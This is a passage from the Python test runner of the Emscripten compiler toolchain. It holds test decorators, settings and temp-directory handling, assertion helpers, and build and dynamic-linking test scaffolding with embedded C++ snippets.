# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG
from tools.shared import LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR
from tools.shared import WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, try_delete
from tools.shared import asbytes, safe_copy, Settings
from tools import shared, line_endings, building
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# TODO(sbc): Remove this check for the legacy name once its been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm', note, negate=True)
return decorated
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
@contextlib.contextmanager
def js_engines_modify(replacements):
"""A context manager that updates shared.JS_ENGINES."""
original = shared.JS_ENGINES
shared.JS_ENGINES = replacements
try:
yield
finally:
shared.JS_ENGINES = original
@contextlib.contextmanager
def wasm_engines_modify(replacements):
"""A context manager that updates shared.WASM_ENGINES."""
original = shared.WASM_ENGINES
shared.WASM_ENGINES = replacements
try:
yield
finally:
shared.WASM_ENGINES = original
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'strict'
]
if Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
]
if Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = '%s_%s' % (name, suffix)
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic library support in asan yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.env = {}
self.temp_files_before_run = []
if not Settings.WASM_BACKEND:
os.environ['EMCC_ALLOW_FASTCOMP'] = '1'
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when EMTEST_SAVE_DIR we still try to start with an empty directoy as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_test_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_test_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_test_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
building.llvm_dis(output_obj, output_ll)
building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
all_sources = [filename] + additional_files
if any(os.path.splitext(s)[1] in ('.cc', '.cxx', '.cpp') for s in all_sources):
compiler = EMXX
else:
compiler = EMCC
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in all_sources:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
self.run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = all_sources + libraries
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
self.run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[], output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertIdenticalUrlEncoded(self, expected, actual, **kwargs):
"""URL decodes the `actual` parameter before checking for equality."""
self.assertIdentical(expected, unquote(actual), **kwargs)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(building.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
# In the long run it would nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
self.fail('subprocess exited with non-zero return code(%d): `%s`' %
(e.returncode, shared.shlex_join(cmd)))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
